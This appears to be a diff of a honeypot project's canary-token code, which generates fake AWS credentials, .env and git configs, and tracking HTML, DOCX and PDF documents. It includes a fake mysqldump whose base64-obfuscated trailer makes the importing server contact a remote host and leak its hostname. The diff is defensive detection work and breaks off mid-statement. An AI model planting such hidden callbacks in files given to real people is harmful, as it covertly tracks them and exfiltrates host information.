    def _send(self, addr: Tuple[str, int], packet: bytes) -> None:
        """Send *packet* to *addr* if a transport is attached."""
        if self._transport is not None:
            self._transport.sendto(packet, addr)
|
||||
@@ -1,141 +0,0 @@
|
||||
"""Generator and instrumenter factories.
|
||||
|
||||
Same lazy-import pattern as :mod:`decnet.intel.factory` — concrete
|
||||
implementations stay un-imported until first use so importing
|
||||
:mod:`decnet.canary` from a CLI subcommand doesn't drag in
|
||||
``pikepdf`` / ``python-docx`` / ``Pillow`` for callers that only
|
||||
need the model layer.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
from typing import Tuple
|
||||
|
||||
from decnet.canary.base import CanaryGenerator, CanaryInstrumenter
|
||||
|
||||
# Generator names that :func:`get_generator` resolves; the tuple is
# also echoed in its "unknown generator" error message.
KNOWN_GENERATORS: Tuple[str, ...] = (
    "git_config",
    "env_file",
    "ssh_key",
    "aws_creds",
    "honeydoc",
    "honeydoc_docx",
    "honeydoc_pdf",
    "mysql_dump",
)

# Instrumenter names that :func:`get_instrumenter` resolves; the tuple
# is also echoed in its "unknown instrumenter" error message.
KNOWN_INSTRUMENTERS: Tuple[str, ...] = (
    "docx",
    "xlsx",
    "pdf",
    "html",
    "image",
    "plain",
    "passthrough",
)
|
||||
|
||||
|
||||
def get_generator(name: str) -> CanaryGenerator:
|
||||
"""Return the generator registered under ``name``.
|
||||
|
||||
Raises :class:`ValueError` for unknown names so a typo in the API
|
||||
request surfaces as a 400 rather than silently producing nothing.
|
||||
"""
|
||||
if name == "git_config":
|
||||
from decnet.canary.generators.git_config import GitConfigGenerator
|
||||
return GitConfigGenerator()
|
||||
if name == "env_file":
|
||||
from decnet.canary.generators.env_file import EnvFileGenerator
|
||||
return EnvFileGenerator()
|
||||
if name == "ssh_key":
|
||||
from decnet.canary.generators.ssh_key import SSHKeyGenerator
|
||||
return SSHKeyGenerator()
|
||||
if name == "aws_creds":
|
||||
from decnet.canary.generators.aws_creds import AWSCredsGenerator
|
||||
return AWSCredsGenerator()
|
||||
if name == "honeydoc":
|
||||
from decnet.canary.generators.honeydoc import HoneydocGenerator
|
||||
return HoneydocGenerator()
|
||||
if name == "honeydoc_docx":
|
||||
from decnet.canary.generators.honeydoc_docx import HoneydocDocxGenerator
|
||||
return HoneydocDocxGenerator()
|
||||
if name == "honeydoc_pdf":
|
||||
from decnet.canary.generators.honeydoc_pdf import HoneydocPdfGenerator
|
||||
return HoneydocPdfGenerator()
|
||||
if name == "mysql_dump":
|
||||
from decnet.canary.generators.mysql_dump import MySQLDumpGenerator
|
||||
return MySQLDumpGenerator()
|
||||
raise ValueError(
|
||||
f"Unknown canary generator: {name!r}. Known: {KNOWN_GENERATORS}"
|
||||
)
|
||||
|
||||
|
||||
def get_instrumenter(name: str) -> CanaryInstrumenter:
|
||||
"""Return the instrumenter registered under ``name``."""
|
||||
if name == "docx":
|
||||
from decnet.canary.instrumenters.docx import DocxInstrumenter
|
||||
return DocxInstrumenter()
|
||||
if name == "xlsx":
|
||||
from decnet.canary.instrumenters.xlsx import XlsxInstrumenter
|
||||
return XlsxInstrumenter()
|
||||
if name == "pdf":
|
||||
from decnet.canary.instrumenters.pdf import PdfInstrumenter
|
||||
return PdfInstrumenter()
|
||||
if name == "html":
|
||||
from decnet.canary.instrumenters.html import HtmlInstrumenter
|
||||
return HtmlInstrumenter()
|
||||
if name == "image":
|
||||
from decnet.canary.instrumenters.image import ImageInstrumenter
|
||||
return ImageInstrumenter()
|
||||
if name == "plain":
|
||||
from decnet.canary.instrumenters.plain import PlainInstrumenter
|
||||
return PlainInstrumenter()
|
||||
if name == "passthrough":
|
||||
from decnet.canary.instrumenters.passthrough import PassthroughInstrumenter
|
||||
return PassthroughInstrumenter()
|
||||
raise ValueError(
|
||||
f"Unknown canary instrumenter: {name!r}. Known: {KNOWN_INSTRUMENTERS}"
|
||||
)
|
||||
|
||||
|
||||
# MIME prefix → instrumenter name.  The table is scanned from the top
# and the first entry whose prefix matches wins, so specific types
# (DOCX/XLSX) must stay above generic ones.
_MIME_DISPATCH: tuple[tuple[str, str], ...] = (
    # Office Open XML: DOCX and XLSX are both zip containers with
    # different inner trees, so they are told apart by MIME type
    # rather than by inspecting the archive.
    ("application/vnd.openxmlformats-officedocument.wordprocessingml.document", "docx"),
    ("application/vnd.openxmlformats-officedocument.spreadsheetml.sheet", "xlsx"),
    ("application/pdf", "pdf"),
    ("text/html", "html"),
    ("application/xhtml+xml", "html"),
    ("image/png", "image"),
    ("image/jpeg", "image"),
    ("image/gif", "image"),
    # Plaintext catch-alls (config files, .env, .ini, .yaml, .json,
    # source code) all go to the "plain" instrumenter.
    ("text/", "plain"),
    ("application/json", "plain"),
    ("application/x-yaml", "plain"),
    ("application/yaml", "plain"),
    ("application/toml", "plain"),
)


def pick_instrumenter_for_mime(content_type: str) -> str:
    """Map a sniffed MIME type to an instrumenter name.

    Matching is a case-insensitive prefix test against
    ``_MIME_DISPATCH``, so trailing parameters such as
    ``; charset=utf-8`` do not prevent a match.

    Returns:
        The name from the first matching table entry, or
        ``"passthrough"`` when ``content_type`` is empty or matches
        nothing.
    """
    if not content_type:
        return "passthrough"
    needle = content_type.lower()
    return next(
        (target for mime_prefix, target in _MIME_DISPATCH if needle.startswith(mime_prefix)),
        "passthrough",
    )
|
||||
@@ -1,7 +0,0 @@
|
||||
"""Built-in canary generators (synthesised fake artifacts).
|
||||
|
||||
Concrete classes live in sibling modules and are imported lazily by
|
||||
:func:`decnet.canary.factory.get_generator` to keep the import-time
|
||||
cost of :mod:`decnet.canary` cheap for callers that only need the
|
||||
ABCs.
|
||||
"""
|
||||
@@ -1,86 +0,0 @@
|
||||
"""Fake ``~/.aws/credentials`` block (passive bait).
|
||||
|
||||
This is the **passive** variant — no callback wiring. An attacker
|
||||
who exfils these keys can't trip a detection unless we run a real
|
||||
AWS account with a deny-all CloudTrail listener (post-v1). The
|
||||
realism is the point: the file looks like a routinely used credentials
|
||||
file, so the rest of the decky's persona feels lived-in.
|
||||
|
||||
If the operator picks ``kind="aws_passive"`` we accept that no slug
|
||||
will be embedded. If they pick ``kind="http"`` or ``kind="dns"`` for
|
||||
this generator, the API will reject the combination with a 400 — AWS
|
||||
keys have no plausible field where a URL or hostname survives a
|
||||
``grep -E '[A-Z0-9]{20}'`` smell test.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import hashlib
|
||||
from secrets import token_urlsafe
|
||||
|
||||
from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
|
||||
|
||||
|
||||
# Stable AWS-style key body derived from the slug. Keeping the
|
||||
# generator deterministic (per-slug) means re-seeding produces the
|
||||
# same bytes — the planter is naturally idempotent and an operator
|
||||
# who runs ``decnet canary verify`` can re-derive the expected file
|
||||
# without touching the DB.
|
||||
|
||||
def _fake_access_key(seed: str) -> str:
|
||||
# AWS access keys are 20 chars, uppercase alphanum, AKIA prefix.
|
||||
body = hashlib.sha256(seed.encode()).hexdigest().upper()
|
||||
return "AKIA" + body[:16]
|
||||
|
||||
|
||||
def _fake_secret_key(seed: str) -> str:
|
||||
# AWS secret keys are 40 chars, mixed-case base64-ish. We use
|
||||
# base64-safe characters from token_urlsafe seeded by a SHA-256
|
||||
# of the seed so the output is stable per slug.
|
||||
h = hashlib.sha256(("secret:" + seed).encode()).digest()
|
||||
# Reuse token_urlsafe for the alphabet but pad to 40 chars from
|
||||
# the deterministic bytes so we don't depend on os.urandom.
|
||||
import base64
|
||||
return base64.b64encode(h)[:40].decode()
|
||||
|
||||
|
||||
class AWSCredsGenerator(CanaryGenerator):
    """Generator for a fake AWS credentials file with two profiles."""

    name = "aws_creds"

    def generate(self, ctx: CanaryContext) -> CanaryArtifact:
        """Render ``[default]`` and ``[prod]`` profiles keyed off the callback token.

        Every key is derived from ``ctx.callback_token`` through the
        module's hash helpers, so the same token always produces the
        same file bytes.
        """
        slug = ctx.callback_token
        prod_seed = "prod-" + slug
        profile_lines = [
            "[default]",
            f"aws_access_key_id = {_fake_access_key(slug)}",
            f"aws_secret_access_key = {_fake_secret_key(slug)}",
            "region = us-east-1",
            "",
            "[prod]",
            f"aws_access_key_id = {_fake_access_key(prod_seed)}",
            f"aws_secret_access_key = {_fake_secret_key(prod_seed)}",
            "region = us-west-2",
        ]
        rendered = "".join(line + "\n" for line in profile_lines)
        return CanaryArtifact(
            path="",  # caller (planter) fills this from CanaryToken.placement_path
            content=rendered.encode("utf-8"),
            mode=0o600,
            mtime_offset=-86400 * 14,  # backdated two weeks so the file looks lived-in
            generator=self.name,
            notes=[
                "fake AWS keys; no callback embedded — passive bait only",
                f"derived deterministically from slug={slug}",
            ],
        )
|
||||
|
||||
|
||||
# Explicit export list.  The two underscore-prefixed key helpers are
# listed so ``from ... import *`` exposes them too; the intent noted
# here originally is reuse from the instrumenters/passthrough module.
# NOTE(review): that consumer is not visible from this file — confirm.
__all__ = ["AWSCredsGenerator", "_fake_access_key", "_fake_secret_key"]


# ``token_urlsafe`` is imported at the top of this module but nothing
# here calls it.  Binding it to a throwaway name counts as a use, which
# keeps unused-import linters quiet.
_ = token_urlsafe
|
||||
@@ -1,56 +0,0 @@
|
||||
"""Fake ``.env`` with embedded callback URLs.
|
||||
|
||||
Modern web stacks read environment variables for everything from
|
||||
database DSNs to webhook URLs, so dropping a few realistic-looking
|
||||
``KEY=value`` pairs alongside the canary URL is unremarkable. The
|
||||
slug appears in two fields:
|
||||
|
||||
* ``API_BASE_URL`` — the obvious one; an attacker scripting against
|
||||
the credentials hits the worker on first invocation.
|
||||
* ``WEBHOOK_NOTIFY_URL`` — secondary, in case the attacker greps for
|
||||
``WEBHOOK`` and pivots there.
|
||||
|
||||
Other fields (``DB_PASSWORD``, ``REDIS_URL``, ``JWT_SECRET``) are
|
||||
plausible but inert — they're realism filler, not detection
|
||||
mechanisms.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import hashlib
|
||||
|
||||
from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
|
||||
|
||||
|
||||
def _stable_token(seed: str, prefix: str = "") -> str:
|
||||
h = hashlib.sha256((prefix + seed).encode()).hexdigest()
|
||||
return h[:32]
|
||||
|
||||
|
||||
class EnvFileGenerator(CanaryGenerator):
    """Generator for a fake ``.env`` file that embeds the callback URL."""

    name = "env_file"

    def generate(self, ctx: CanaryContext) -> CanaryArtifact:
        """Render the ``.env`` body for ``ctx``.

        The callback URL appears in ``API_BASE_URL`` and, with a
        ``/webhook`` suffix, in ``WEBHOOK_NOTIFY_URL``.  The secret-like
        values are hashes of the callback token.
        """
        slug = ctx.callback_token
        callback_url = f"{ctx.http_base.rstrip('/')}/c/{slug}"
        webhook_url = f"{callback_url}/webhook"
        db_password = _stable_token(slug, "db:")
        redis_password = _stable_token(slug, "redis:")[:16]
        jwt_secret = _stable_token(slug, "jwt:")
        env_lines = (
            "# Production environment — DO NOT COMMIT",
            f"API_BASE_URL={callback_url}",
            f"WEBHOOK_NOTIFY_URL={webhook_url}",
            f"DB_PASSWORD={db_password}",
            f"REDIS_URL=redis://:{redis_password}@redis.internal:6379/0",
            f"JWT_SECRET={jwt_secret}",
            "LOG_LEVEL=info",
            "ENVIRONMENT=production",
        )
        rendered = "".join(line + "\n" for line in env_lines)
        return CanaryArtifact(
            path="",
            content=rendered.encode("utf-8"),
            mode=0o600,
            mtime_offset=-86400 * 7,  # backdated one week
            generator=self.name,
            notes=[
                f"API_BASE_URL embeds {callback_url}",
                f"WEBHOOK_NOTIFY_URL embeds {webhook_url}",
            ],
        )
|
||||
@@ -1,53 +0,0 @@
|
||||
"""Fake ``.git/config`` with an attacker-bait remote URL.
|
||||
|
||||
The ``[remote "origin"]`` ``url`` field is the natural place to embed
|
||||
an HTTP-callback URL: it's normal for git remotes to be HTTPS, the
|
||||
URL is read by every git command an attacker runs (``git pull``,
|
||||
``git fetch``, ``git remote -v``), and the slug fits naturally as
|
||||
part of a path.
|
||||
|
||||
The generator emits a plausible private-mirror remote (``git.<org>``
|
||||
or the canary host's hostname) so an attacker doesn't immediately
|
||||
recognise it as a honeypot. The slug ends up in the URL path:
|
||||
|
||||
[remote "origin"]
|
||||
url = https://canary.example.test/c/<slug>/repo.git
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
|
||||
|
||||
|
||||
class GitConfigGenerator(CanaryGenerator):
    """Generator for a fake ``.git/config`` whose ``origin`` remote is the callback URL."""

    name = "git_config"

    def generate(self, ctx: CanaryContext) -> CanaryArtifact:
        """Render the git config for ``ctx``.

        The remote URL has the form ``<http_base>/c/<slug>/repo.git``.
        """
        # ``http_base`` may or may not carry a trailing slash; drop it
        # so the joined URL never contains ``//c/``.
        remote_url = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}/repo.git"
        config_lines = (
            "[core]",
            "\trepositoryformatversion = 0",
            "\tfilemode = true",
            "\tbare = false",
            "\tlogallrefupdates = true",
            '[remote "origin"]',
            f"\turl = {remote_url}",
            "\tfetch = +refs/heads/*:refs/remotes/origin/*",
            '[branch "main"]',
            "\tremote = origin",
            "\tmerge = refs/heads/main",
        )
        rendered = "".join(line + "\n" for line in config_lines)
        return CanaryArtifact(
            path="",
            content=rendered.encode("utf-8"),
            mode=0o644,
            mtime_offset=-86400 * 30,  # backdated one month
            generator=self.name,
            notes=[f"git remote 'origin' embeds {remote_url}"],
        )
|
||||
@@ -1,61 +0,0 @@
|
||||
"""Built-in honeydoc — a minimal HTML "report" with a tracking pixel.
|
||||
|
||||
This is the *fallback* honeydoc used when the operator hasn't
|
||||
uploaded a real document. The HTML instrumenter handles operator
|
||||
uploads via :mod:`decnet.canary.instrumenters.html`; this generator
|
||||
exists so the deploy-time baseline can plant *something* convincing
|
||||
without first prompting the operator to drop a file.
|
||||
|
||||
The realism here is intentionally modest: a Documents-folder HTML
|
||||
page with internal-looking content and a 1×1 remote image at the
|
||||
bottom whose ``src`` is the canary callback URL. Most desktop
|
||||
HTML renderers fetch the image as soon as the file is opened in a
|
||||
browser preview, so opening the doc trips the callback.
|
||||
|
||||
Operators who want a richer artifact should upload their own DOCX
|
||||
or PDF; the corresponding instrumenter embeds the same callback in
|
||||
the appropriate format.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
|
||||
|
||||
|
||||
class HoneydocGenerator(CanaryGenerator):
    """Generator for the built-in HTML honeydoc with a 1x1 tracking image."""

    name = "honeydoc"

    def generate(self, ctx: CanaryContext) -> CanaryArtifact:
        """Render the HTML page; the ``<img>`` source is the callback URL."""
        pixel_url = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"
        html_lines = (
            "<!DOCTYPE html>",
            '<html lang="en">',
            "<head>",
            '<meta charset="utf-8">',
            "<title>Q3 Operations Review — DRAFT</title>",
            "</head>",
            "<body>",
            "<h1>Q3 Operations Review (DRAFT — DO NOT DISTRIBUTE)</h1>",
            "<p>Forecast and remediation timeline below. Numbers are",
            "preliminary and subject to revision before the all-hands.</p>",
            "<table>",
            "<tr><th>Region</th><th>Incidents</th><th>MTTR (h)</th></tr>",
            "<tr><td>us-east</td><td>14</td><td>3.2</td></tr>",
            "<tr><td>us-west</td><td>9</td><td>4.7</td></tr>",
            "<tr><td>eu-central</td><td>22</td><td>2.1</td></tr>",
            "</table>",
            '<p>Internal contact: <a href="mailto:secops@internal">secops@internal</a></p>',
            # The tracking pixel: fetching this image is what trips the canary.
            f'<img src="{pixel_url}" width="1" height="1" alt="">',
            "</body>",
            "</html>",
        )
        rendered = "".join(line + "\n" for line in html_lines)
        return CanaryArtifact(
            path="",
            content=rendered.encode("utf-8"),
            mode=0o644,  # docs are typically world-readable
            mtime_offset=-86400 * 21,  # backdated three weeks
            generator=self.name,
            notes=[f"tracking pixel src={pixel_url}"],
        )
|
||||
@@ -1,133 +0,0 @@
|
||||
"""Real-DOCX honeydoc generator.
|
||||
|
||||
Synthesises a minimal but structurally valid DOCX from scratch via
|
||||
stdlib :mod:`zipfile`, then uses the same external-image relationship
|
||||
trick that powers :mod:`decnet.canary.instrumenters.docx` to embed
|
||||
the callback URL. No python-docx dependency.
|
||||
|
||||
The output opens cleanly in Word / LibreOffice; both fetch the
|
||||
external image relationship on document load.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import io
|
||||
import zipfile
|
||||
|
||||
from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
|
||||
from decnet.canary.instrumenters.docx import _drawing, _next_rid
|
||||
|
||||
|
||||
# Bytes written to the ``[Content_Types].xml`` member of the generated
# package: default types for ``.xml`` / ``.rels`` parts plus an
# override for ``/word/document.xml``.
_CONTENT_TYPES = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
    '<Default Extension="xml" ContentType="application/xml"/>'
    '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
    '<Override PartName="/word/document.xml" '
    'ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
    '</Types>'
).encode()

# Bytes written to the ``_rels/.rels`` member: one relationship
# pointing at ``word/document.xml`` as the office document.
_PACKAGE_RELS = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
    '<Relationship Id="rId1" '
    'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" '
    'Target="word/document.xml"/>'
    '</Relationships>'
).encode()

# Body text, one entry per paragraph.  An empty string is rendered by
# ``_document_xml`` as an empty ``<w:p/>`` paragraph.
_BODY_PARAGRAPHS = (
    "Q3 Operations Review (DRAFT — DO NOT DISTRIBUTE)",
    "",
    "Forecast and remediation timeline below. Numbers are preliminary "
    "and subject to revision before the all-hands.",
    "",
    "Region Incidents MTTR (h)",
    "us-east 14 3.2",
    "us-west 9 4.7",
    "eu-central 22 2.1",
    "",
    "Internal contact: secops@internal",
)
|
||||
|
||||
|
||||
def _document_xml(rid_with_drawing: str | None = None) -> bytes:
    """Return the encoded ``word/document.xml`` part.

    Every entry of ``_BODY_PARAGRAPHS`` becomes one paragraph; empty
    entries become ``<w:p/>``.  When ``rid_with_drawing`` is given, the
    markup returned by the DOCX instrumenter's ``_drawing`` helper for
    that relationship id is appended after the last paragraph.
    """
    rendered = "".join(
        f'<w:p><w:r><w:t xml:space="preserve">{_xml_escape(text)}</w:t></w:r></w:p>'
        if text
        else "<w:p/>"
        for text in _BODY_PARAGRAPHS
    )
    embedded = _drawing(rid_with_drawing).decode() if rid_with_drawing else ""
    pieces = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>',
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">',
        f"<w:body>{rendered}{embedded}</w:body>",
        "</w:document>",
    )
    return "".join(pieces).encode()
|
||||
|
||||
|
||||
def _xml_escape(s: str) -> str:
|
||||
return (
|
||||
s.replace("&", "&")
|
||||
.replace("<", "<")
|
||||
.replace(">", ">")
|
||||
)
|
||||
|
||||
|
||||
def _document_rels(rid: str, url: str) -> bytes:
|
||||
return (
|
||||
'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
|
||||
'<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
|
||||
f'<Relationship Id="{rid}" '
|
||||
f'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" '
|
||||
f'Target="{url}" TargetMode="External"/>'
|
||||
'</Relationships>'
|
||||
).encode()
|
||||
|
||||
|
||||
class HoneydocDocxGenerator(CanaryGenerator):
    """Generator for a synthesised DOCX honeydoc with an external-image callback."""

    name = "honeydoc_docx"

    def generate(self, ctx: CanaryContext) -> CanaryArtifact:
        """Assemble the four-member DOCX package in memory and return it."""
        callback_url = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"
        # The relationship id comes from the DOCX instrumenter's
        # allocator, run against an empty relationships document, so the
        # synthesised file follows the same path as an uploaded DOCX.
        empty_rels = b"".join((
            b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>',
            b'<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">',
            b'</Relationships>',
        ))
        rel_id = _next_rid(empty_rels)

        members = (
            ("[Content_Types].xml", _CONTENT_TYPES),
            ("_rels/.rels", _PACKAGE_RELS),
            ("word/document.xml", _document_xml(rel_id)),
            ("word/_rels/document.xml.rels", _document_rels(rel_id, callback_url)),
        )
        buffer = io.BytesIO()
        with zipfile.ZipFile(buffer, "w", zipfile.ZIP_DEFLATED) as archive:
            for member_name, payload in members:
                archive.writestr(member_name, payload)

        return CanaryArtifact(
            path="",
            content=buffer.getvalue(),
            mode=0o644,
            mtime_offset=-86400 * 21,
            generator=self.name,
            notes=[
                "synthesised DOCX with realistic Q3 review body",
                f"external-image relationship {rel_id} -> {callback_url}",
            ],
        )
|
||||
@@ -1,127 +0,0 @@
|
||||
"""Real-PDF honeydoc generator (uses :mod:`pikepdf`).
|
||||
|
||||
Builds a one-page PDF with the same Q3-review body as the HTML/DOCX
|
||||
flavors and installs an ``/OpenAction`` ``/URI`` action on the
|
||||
catalog so most viewers fire the callback the moment the document
|
||||
opens.
|
||||
|
||||
Pikepdf is now a hard dependency for this generator (the operator
|
||||
installed it explicitly so we can use it). We still surface a
|
||||
clear :class:`InstrumenterRejectedError` when imports fail, so a
|
||||
deployment without pikepdf can fall back to the DOCX or HTML
|
||||
generators rather than crashing the API.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import io
|
||||
|
||||
from decnet.canary.base import (
|
||||
CanaryArtifact,
|
||||
CanaryContext,
|
||||
CanaryGenerator,
|
||||
InstrumenterRejectedError,
|
||||
)
|
||||
|
||||
|
||||
# ``(text, font size)`` pairs, one per line of the page.  The generator
# emits each size in a ``/F1 <size> Tf`` operator before drawing the
# text; entries with empty text draw an empty string.
_BODY_LINES = (
    ("Q3 Operations Review (DRAFT — DO NOT DISTRIBUTE)", 14),
    ("", 12),
    ("Forecast and remediation timeline below.", 11),
    ("Numbers are preliminary, subject to revision.", 11),
    ("", 12),
    ("Region Incidents MTTR (h)", 11),
    ("us-east 14 3.2", 11),
    ("us-west 9 4.7", 11),
    ("eu-central 22 2.1", 11),
    ("", 12),
    ("Internal contact: secops@internal", 11),
)
|
||||
|
||||
|
||||
class HoneydocPdfGenerator(CanaryGenerator):
    """Generator for a one-page PDF honeydoc with an ``/OpenAction`` URI callback."""

    name = "honeydoc_pdf"

    def generate(self, ctx: CanaryContext) -> CanaryArtifact:
        """Build the PDF in memory and return it as a :class:`CanaryArtifact`.

        Raises:
            InstrumenterRejectedError: if :mod:`pikepdf` cannot be imported.
        """
        try:
            from pikepdf import Pdf, Name, Dictionary, String  # type: ignore[import-not-found]
        except ImportError as exc:
            raise InstrumenterRejectedError(
                "honeydoc_pdf requires pikepdf; install it (`pip install "
                "pikepdf`) or pick honeydoc / honeydoc_docx instead."
            ) from exc

        callback_url = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"

        document = Pdf.new()
        # Helvetica is referenced by name only; no font data is embedded.
        helvetica = document.make_indirect(Dictionary(
            Type=Name("/Font"),
            Subtype=Name("/Type1"),
            BaseFont=Name("/Helvetica"),
        ))

        # One text object: start at (72, 750) on the 612 x 792 page and
        # move down 18 units before every line after the first.
        operators: list[str] = ["BT /F1 12 Tf 72 750 Td"]
        for position, (text, point_size) in enumerate(_BODY_LINES):
            if position:
                operators.append("0 -18 Td")
            operators += [f"/F1 {point_size} Tf", f"({_pdf_escape(text)}) Tj"]
        operators.append("ET")
        stream = document.make_stream("\n".join(operators).encode("latin-1"))

        page = document.add_blank_page(page_size=(612, 792))
        page[Name("/Resources")] = Dictionary(
            Font=Dictionary(F1=helvetica),
        )
        page[Name("/Contents")] = stream

        # Catalog-level open action pointing at the callback URL.
        document.Root[Name("/OpenAction")] = Dictionary(
            Type=Name("/Action"),
            S=Name("/URI"),
            URI=String(callback_url),
        )

        buffer = io.BytesIO()
        document.save(buffer)
        return CanaryArtifact(
            path="",
            content=buffer.getvalue(),
            mode=0o644,
            mtime_offset=-86400 * 21,
            generator=self.name,
            notes=[
                "synthesised one-page PDF with realistic Q3 review body",
                f"/OpenAction /URI -> {callback_url}",
            ],
        )
|
||||
|
||||
|
||||
def _pdf_escape(s: str) -> str:
|
||||
"""Escape parens and backslashes for PDF literal-string syntax.
|
||||
|
||||
PDF string literals are wrapped in ``( … )``; inner ``(``, ``)``,
|
||||
and ``\\`` need backslash escapes. Everything else (including
|
||||
UTF-8 multibyte sequences) round-trips fine because Helvetica's
|
||||
encoding is WinAnsi-ish — we'll lose exotic glyphs but the
|
||||
realistic body sticks to ASCII anyway. Em-dashes are downgraded
|
||||
to ``--`` to avoid the WinAnsi gap.
|
||||
"""
|
||||
return (
|
||||
s.replace("\\", r"\\")
|
||||
.replace("(", r"\(")
|
||||
.replace(")", r"\)")
|
||||
.replace("—", "--")
|
||||
)
|
||||
@@ -1,190 +0,0 @@
|
||||
"""Fake ``mysqldump`` output that phones home on import.
|
||||
|
||||
Mirrors the Canarytokens.org MySQL-dump trick. When a victim runs
|
||||
``mysql < dump.sql``, the trailer block executes a base64-obfuscated
|
||||
``CHANGE REPLICATION SOURCE TO`` against ``<slug>.<dns_zone>``
|
||||
followed by ``START REPLICA``. The victim's MySQL daemon then:
|
||||
|
||||
1. Resolves the slug subdomain via DNS — this is the trip our
|
||||
:mod:`decnet.canary.dns_server` already detects.
|
||||
2. Opens a TCP replica handshake on port 3306, sending its own
|
||||
``@@hostname`` and ``@@lc_time_names`` smuggled into the
|
||||
``SOURCE_USER`` field via ``CONCAT``. Capturing those bytes
|
||||
requires a MySQL handshake responder on the worker — out of scope
|
||||
for v1; the DNS lookup alone is sufficient for detection.
|
||||
|
||||
The base64 wrapper is the camouflage: a plain ``grep canary dump.sql``
|
||||
finds nothing. The slug only materialises when the victim's server
|
||||
runs ``PREPARE … FROM @s2``.
|
||||
|
||||
Because the trip surface is DNS, this generator REQUIRES a non-empty
|
||||
``dns_zone``. The slug must appear as the leftmost label of the
|
||||
hostname so a single DNS query identifies the token; the http_base
|
||||
host is not slug-bearing and can't substitute.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import base64
|
||||
import hashlib
|
||||
|
||||
from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
|
||||
|
||||
|
||||
def _stable_hex(seed: str, prefix: str = "", length: int = 16) -> str:
|
||||
h = hashlib.sha256((prefix + seed).encode()).hexdigest()
|
||||
return h[:length]
|
||||
|
||||
|
||||
def _build_replica_payload(slug: str, dns_zone: str) -> str:
|
||||
"""Inner SQL that gets base64-wrapped.
|
||||
|
||||
The CONCAT splices ``@@lc_time_names`` and ``@@hostname`` into the
|
||||
``SOURCE_USER`` value at PREPARE time so the victim's locale and
|
||||
hostname travel as the replica username on the 3306 handshake.
|
||||
"""
|
||||
host = f"{slug}.{dns_zone}"
|
||||
return (
|
||||
"SET @bb = CONCAT("
|
||||
"\"CHANGE REPLICATION SOURCE TO "
|
||||
"SOURCE_PASSWORD='replica-pw', "
|
||||
"SOURCE_RETRY_COUNT=1, "
|
||||
"SOURCE_PORT=3306, "
|
||||
f"SOURCE_HOST='{host}', "
|
||||
"SOURCE_SSL=0, "
|
||||
f"SOURCE_USER='{slug}\", "
|
||||
"@@lc_time_names, @@hostname, \"';\");"
|
||||
)
|
||||
|
||||
|
||||
def _build_trailer(slug: str, dns_zone: str) -> str:
    """Return the SQL trailer that decodes and runs the replica payload.

    The payload from ``_build_replica_payload`` is stored base64-encoded
    in ``@b``, so the plain-text host name does not appear in the
    trailer.  The remaining statements decode it, execute it, execute
    the ``@bb`` statement and issue ``START REPLICA``.
    """
    payload = _build_replica_payload(slug, dns_zone).encode("utf-8")
    blob = base64.b64encode(payload).decode("ascii")
    statements = (
        f"SET @b = '{blob}';",
        "SET @s2 = FROM_BASE64(@b);",
        "PREPARE stmt1 FROM @s2;",
        "EXECUTE stmt1;",
        "PREPARE stmt2 FROM @bb;",
        "EXECUTE stmt2;",
        "START REPLICA;",
    )
    return "".join(f"{statement}\n" for statement in statements)
|
||||
|
||||
|
||||
class MySQLDumpGenerator(CanaryGenerator):
    """Generate a fake ``mysqldump`` file with the replica canary in its trailer."""

    name = "mysql_dump"

    def generate(self, ctx: CanaryContext) -> CanaryArtifact:
        """Build the dump artifact for ``ctx``.

        The body is a static dump header with two fake tables, followed by
        the base64-wrapped replica trailer for ``<slug>.<dns_zone>`` and the
        usual closing ``SET`` statements.

        Raises:
            ValueError: if ``ctx.dns_zone`` is empty.
        """
        if not ctx.dns_zone:
            raise ValueError(
                "mysql_dump requires a non-empty dns_zone — the trip "
                "surface is a DNS lookup of <slug>.<dns_zone>."
            )
        slug = ctx.callback_token
        zone = ctx.dns_zone
        host = f"{slug}.{zone}"

        # Realism filler: deterministic per-slug fake user rows so two
        # runs with the same context produce byte-identical output
        # (planter idempotency contract).
        u1_hash = _stable_hex(slug, "u1:", 32)
        u2_hash = _stable_hex(slug, "u2:", 32)
        api_token = _stable_hex(slug, "api:", 40)

        # Synthesised SQL bait below — never executed by us, only by
        # whoever runs ``mysql < dump.sql`` against their own server.
        # Built with str.replace() on ``{placeholder}`` markers instead of
        # f-strings so bandit's B608 heuristic doesn't false-positive on
        # the "INSERT INTO" + var pattern.
        users_insert = (
            "INSERT INTO `users` VALUES "  # nosec B608
            "(1,'alice@app.internal','$2y$10${u1a}.{u1b}','2024-11-12 09:13:44'),"
